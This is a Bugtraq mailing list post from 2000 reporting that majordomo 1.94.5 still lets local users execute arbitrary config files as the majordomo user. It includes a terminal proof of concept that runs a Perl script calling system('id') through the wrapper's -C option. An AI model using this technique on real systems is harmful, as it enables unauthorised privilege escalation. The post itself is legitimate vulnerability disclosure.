Bugtraq mailing list archives

majordomo 1.94.5 does not fix all vulnerabilities

From: bsides () TOWERY COM (Brock Sides)
Date: Mon, 24 Jan 2000 14:55:42 -0600


Whereas majordomo 1.94.5 does fix the bug in resend, discovered by Brock
Tellier, that permits execution of arbitrary code as user majordomo, it
apparently does not fix the other bug in the script majordomo, that
permits execution of arbitrary config files as user majordomo:

On a fresh install of majordomo 1.94.5 in /tmp:

[brock@o2 /tmp]$ id
uid=1116(brock) gid=1116(brock)
[brock@o2 /tmp]$ ls -l ./id.pl
-rwxr-xr-x    1 brock    brock         31 Jan 24 14:17 ./id.pl
[brock@o2 /tmp]$ cat id.pl
#!/usr/bin/perl

system("id");
[brock@o2 /tmp]$ ./majordomo-1.94.5/wrapper majordomo -C ./id.pl
uid=1126(majordomo) gid=1(daemon)
./id.pl did not return a true value at /tmp/majordomo-1.94.5/majordomo
line 47.
[brock@o2 /tmp]$

--
Brock Sides
Unix Systems Administration
Towery Publishing
bsides () towery com

Current thread:

Re: usual iploggers miss some variable stealth scans David LeBlanc (Jan 18)
- <Possible follow-ups>
- Re: usual iploggers miss some variable stealth scans Hank Leininger (Jan 18)
- Re: usual iploggers miss some variable stealth scans Oliver Friedrichs (Jan 19)
  - Re: usual iploggers miss some variable stealth scans Ralf Laue (Jan 21)
  - Re: usual iploggers miss some variable stealth scans antirez (Jan 22)
    - Re: usual iploggers miss some variable stealth scans Theo de Raadt (Jan 23)
    - Security Bulletins Digest Aleph One (Jan 24)
    - majordomo 1.94.5 does not fix all vulnerabilities Brock Sides (Jan 24)
    - Re: majordomo 1.94.5 does not fix all vulnerabilities Chan Wilson (Jan 25)
    - Re: majordomo 1.94.5 does not fix all vulnerabilities Dave Barr (Jan 25)
    - Re: majordomo 1.94.5 does not fix all vulnerabilities Olaf Kirch (Jan 25)
    - Re: majordomo 1.94.5 does not fix all vulnerabilities Martin Mares (Jan 25)